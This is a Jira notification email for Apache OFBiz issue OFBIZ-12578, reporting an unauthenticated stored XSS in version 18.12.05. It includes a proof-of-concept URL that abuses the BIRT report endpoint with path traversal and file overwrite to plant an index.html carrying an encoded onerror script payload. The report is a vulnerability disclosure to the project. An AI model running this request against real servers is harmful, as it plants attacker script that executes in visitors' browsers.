[jira] [Created] (OFBIZ-12578) Unauth Stored XSS

Nikita Podotykin (Jira) Mon, 21 Feb 2022 05:10:05 -0800

Nikita Podotykin created OFBIZ-12578:
----------------------------------------


             Summary: Unauth Stored XSS
                 Key: OFBIZ-12578
                 URL: https://issues.apache.org/jira/browse/OFBIZ-12578
             Project: OFBiz
          Issue Type: Bug
    Affects Versions: 18.12.05
            Reporter: Nikita Podotykin
             Fix For: 18.12.05
         Attachments: image-2022-02-21-16-04-20-703.png, 
image-2022-02-21-16-04-53-035.png

*Description of the vulnerability*
*Unauth Stored XSS*

So, let's try to create an html file in the current folder — index.html. An 
attacker could inject
a malicious payload and execute it using Stored XSS.

https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
SalesReport.rptdesign&__format=html&__overwrite=true&__document=index.html&reportBy=%3c%69%6d%67%20%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c
%65%72%74%28%29%3e

!image-2022-02-21-16-04-20-703.png!

When accessed along the path /birt/index.html, the injected malicious load will 
be executed.

!image-2022-02-21-16-04-53-035.png!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)

[jira] [Created] (OFBIZ-12578) Unauth Stored XSS

Reply via email to